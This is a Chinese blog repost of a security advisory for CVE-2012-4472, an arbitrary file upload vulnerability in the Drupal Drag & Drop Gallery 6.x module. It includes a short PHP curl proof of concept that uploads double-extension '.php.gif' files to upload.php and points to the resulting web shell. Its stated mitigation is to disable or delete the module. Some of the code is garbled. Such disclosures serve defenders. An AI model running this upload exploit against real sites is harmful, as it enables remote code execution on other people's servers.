drupal 禁止上传PHP文件,Drupal Drag & Drop Gallery模块upload.php任意文件上传漏洞

于 2021-04-13 05:25:55 发布
阅读量89 收藏
点赞数
文章标签: drupal 禁止上传PHP文件

发布日期:2012-11-30

更新日期:2012-12-18

受影响系统:

Drupal Drag & Drop Gallery 6.x

描述:

--------------------------------------------------------------------------------

CVE(CAN) ID: CVE-2012-4472

Drupal Drag & Drop Gallery模块创建了一个图库节点类型,允许通过拖放本地文件系统内的图形,添加图形到图库内。

Drag & Drop Gallery 6.x-1.5及更早版本的sites/all/modules/dragdrop_gallery/upload.php内存在文件上传漏洞。攻击者通过上传带有可执行扩展名的文件,然后通过filedir参数来指定目录以访问此文件,进而执行任意PHP代码。

链接:http://secunia.com/advisories/49698

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4472

http://www.opensyscom.fr/Actualites/drupal-modules-drag-a-drop-gallery-arbitrary-file-upload-vulnerability.html

http://drupal.org/node/1679442

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$uploadfile="db.php.gif";

$uploadfile2="lo.php.gif";

$ch = curl_init("http://localhost/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",

'user_file[1]'=>"@$uploadfile2"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

Shell Access : http://localhost/drupal/sites/all/modules/dragdrop_gallery/ lo.php.gif db.php.gif

Filename : $postResult output

lo.php

phpinfo();

?>

建议:

--------------------------------------------------------------------------------

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*禁用或删除Drag & Drop Gallery模块

厂商补丁:

Drupal

------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

十七卷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php文件上传表单摘自drupal的代码
01-20
drupal文件上传表单的例子 复制代码 代码如下: function upload_form() { $form = array(); // If this #attribute is not present, upload will fail on submit $form[‘#attributes’][‘enctype’] = ‘multipart...
drupal上传要点
经验在于积累而不在于年限---dreamboycx
11-29 284
在表单项加上 $forms['#attributes']['enctype'] = 'multipart/form-data'; file_directory_path() 函数返回默认文件上传路径; file_upload_max_size() 函数返回php设置文件最大上传大小 file_check_directory($directory,$mode,$form_item) 函数用来检
php上传文件安全检测,PHP图像上传安全检查清单
weixin_39836898的博客
03-27 294
我正在编写脚本以将图像上传到我的应用程序。以下安全步骤是否足以使应用程序从脚本角度安全?使用.httaccess禁止PHP上传文件运行。如果文件名包含字符串“ php”,则不允许上传。仅允许扩展名:jpg,jpeg,gif和png。仅允许图像文件类型。禁止使用两种文件类型的图像。更改图像名称。上载到不是根目录的子目录。这是我的脚本:$filename=$_FILES['my_files'][...
drupal7 开发自定义上传、下载模块上传功能
dianai7709的博客
12-21 248
关键点有两个:1.在页面上显示出上传的控件,2.代码实现文件上传到服务器的功能 一、显示控件: 先来看关键点1: 实现页面显示出上传控件, 关键代码: $form['my_file_field'] = array( '#type' => 'managed_file', '#title' => '文件', ) ...
关于一个任意文件上传漏洞场景的讨论
07-21 713
我在知识星球发起一个问题:#安全题目#经常遇到一些系统架构会设置单独的文件服务器,甚至有些saas软件服务会要求客户提供hdfs用来存储用户上传的图片等附件。这种情况下,...
upload_video:用于上传视频的 Drupal 6 模块
07-22
上传视频用于上传视频的 Drupal 6 模块
Drupal User Karma模块跨站脚本和SQL注入漏洞.php
12-15
Drupal User Karma模块跨站脚本和SQL注入漏洞.php
mac 下 drupal .htaccess配置文件
11-02
mac电脑在xampp环境下搭建drupal使用的.htaccess配置文件,下载后将文件名改为.htaccess放在网站根目录即可。 如果网站不在根目录则放在对应级别的目录下 并修改htaccess文件119行和123行,将119行RewriteBase /...
node-v9.6.0-x86.msi
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Python基于机器学习的分布式系统故障诊断系统源代码,分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别
04-29
基于技术手段(包括但不限于机器学习、深度学习等技术)对分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别,实现分布式系统故障运维的智能化,快速恢复故障的同时大大降低分布式系统运维工作的难度,减少运维对人力资源的消耗。在分布式系统某个节点发生故障时,故障会沿着分布式系统的拓扑结构进行传播,造成自身节点及其邻接节点相关的KPI指标和发生大量日志异常
JavaScript前端开发的核心语言前端开发的核心语言
最新发布
04-29
javascript 当今互联网时代,JavaScript已经成为了前端开发的核心语言它是一种高级程序设计语言,通常用于网页的交互和动态效果的实现。JavaScript的灵活性以及广泛的使用使得它变得异常重要,能够为用户带来更好的用户体验。 JavaScript的特点之一是它的轻量级,它可以在网页运行无需单独的编译或下载。这意味着网页可以更快地加载并且用户无需安装额外的软件才能运行网页上的JavaScript代码。此外,与HTML和CSS紧密结合,可以直接在HTML文档嵌入,使得网页的开发变得非常便捷。 JavaScript具有动态性,它可以在浏览器实时修改页面内容和样。它可以通过操作DOM(文档对象模型来动态地修改网页的结构和布局,并且可以根据用户的行为实时地响应各种事件,如点击、标悬停、滚动等。这使得开发者可以轻松地为网页添加交互性和动态效果,提供更好的用户体验。 JavaScript也是一种面向对象的语言。它支持对象、类、继承、多态等面向对象编程的概念,使得代码结构更加清晰和可维护。开发者可以创建自定义的对象和方法,对功能进行封装和复用,提高代码的可读性和可维护性。
四则运算自动生成程序安装包
04-29
四则运算自动生成程序安装包
基于Linux的私有文件服务器(网盘).zip
04-29
基于Linux的私有文件服务器(网盘)
源代码-access 管理 系统 API 文件.zip
04-29
源代码-access 管理 系统 API 文件.zip
海康机器人智能读码器工业协议操作手册V1.0.2.pdf
04-29
海康机器人智能读码器工业协议操作手册V1.0.2.pdf
256ssm-mysql-jsp 在线捐赠系统.zip(可运行源码+数据库文件+文档)
04-29
根据需求,确定系统采用JSP技术,JAVA作为编程语言,MySQL作为数据库。整个系统要操作方便、易于维护、灵活实用。主要实现了系统用户管理、注册用户管理、信息发布管理、医疗物品分类管理、项目信息管理、捐赠项目管理、志愿者申请管理、个人求助管理、个人捐赠统计、系统管理等功能。 前台用户模块包括: 1. 首页:网站打开的第一个页面,显示网站的最新信息。 2. 用户注册/登录、3. 新闻资讯、4. 暖心故事、5. 我要求助、6. 我要捐赠、7. 我们的项目、8. 志愿者心:实现志愿者心的列表显示、9. 系统简介、10. 在线留言、11. 用户后台 后台管理员模块包括: 1. 系统用户管理、2. 注册用户管理、3. 信息发布管理、4. 医疗物品分类管理、5. 项目信息管理、6. 捐赠项目管理、7. 志愿者申请管理、8. 个人求助管理:管理员可以设置个人求助审核状态,可以删除个人求助审核信息。 9. 个人捐赠统计:管理员可以查看个人捐赠统计信息。 10. 系统管理:管理员可以对留言板信息进行查看、回复或删除 关键词:医药捐赠系统;JSP;MySQL
系统性文献综述的撰写(Systematic Review)-范文2.pdf
04-29
参考范文:Findings on Teaching Machine Learning inHigh School: A Ten -Year SystematicLiterature Review 用于学习研究,侵权请联系本人删除
管理后台项目开发脚手架,基于vue-element-admin和springboot搭建,前后端分离方式开发和部署.zip
04-29
管理后台项目开发脚手架,基于vue-element-admin和springboot搭建,前后端分离方式开发和部署.zip
drupal mysql配置文件
05-24
Drupal ,MySQL 的配置文件通常是在 sites/default/settings.php 文件进行配置的。以下是一个示例: ```php $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'your_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值